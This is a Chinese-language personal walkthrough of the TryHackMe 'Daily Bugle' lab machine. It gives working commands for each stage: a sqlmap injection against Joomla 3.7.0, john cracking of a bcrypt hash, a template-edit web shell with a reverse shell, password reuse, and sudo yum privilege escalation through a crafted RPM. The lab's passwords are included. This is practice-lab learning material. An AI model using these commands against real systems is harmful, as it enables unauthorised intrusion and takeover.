THM打靶日寄7-DailyBugle

• 扫描打点

  

  看到有个 mysql 后面可能会用到，并且看到 80 端口的服务是 joomla

  robots.txt 里面找到各个网站，就懒得扫了（逃

  

  （当然也可以从 nmap 扫描结果中看出来

  百度一下 joomla ，发现有个工具 joomscan 来判断版本

  joomscan -u 10.10.186.85

  

  看到是 3.7.0 ，去 exploitdb 搜一搜恰好有 poc

  让直接拿 sqlmap 硬打就行：

  sqlmap -u "http://10.10.186.85/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

  update: sqlmap 好慢啊，去找了个专门的 poc 来打

  

  拿到了用户名 jonah 和加密后的密码：$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

  幽默 hash_identifier 没识别

  只能去这里对着特征找了

  以 $2 为开头，搜索到了这个

  

  用 john 爆一下：john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt --format=bcrypt

  得到密码是 spiderman123

  想到刚刚得到的管理员后台，直接登录

• joomla 后台 getshell

  一开始想用 Install 那里传马，但没传上去

  搜了一下找到 CVE-2021-23132

  去 media 中的 option 界面，把 Path to file Path 改成 ./ 来进行目录遍历

  

  

  到 /administrator/components/com_users 下删除 config.xml 并重新上传，内容参考上面的网址

  等下这里一直上传不上去，但是通读一下 poc ,这一步是为了得到 SuperUser 权限的用户，但我们已经是了，就跳到下一步

  去 templates 那里，修改 beez3/error.php

  

  然后访问 templates/beez3/error.php 就能有代码执行

  

  既然这样了直接把 error.php 改成反弹 shell 即可连接

  

• Linux 提权

  进去之后用户为 apache ，连访问正常用户目录都不行

  

  虽然我没有思路，但传个 msf 马先啊嗯

  看题解，去 /var/www/html 下找到 configuration.php

  

  然后要考虑密码复用的问题，即用 nv5uz9r3ZEDzVjNu 试图登录 root 或者刚刚的 jjameson

  

  这次 sudo -l 终于出东西了：

  

  继续去 https://gtfobins.github.io/ 找

  大概是要把提权脚本用 fpm 打成 RPM 包，传上去用有权限的 yum 运行

  打包： fpm -n x -s dir -t rpm -a all --before-install sudo.sh .

  运行：sudo yum localinstall -y x-1.0-1.noarch.rpm

  然后 sudo /bin/bash ，提权成功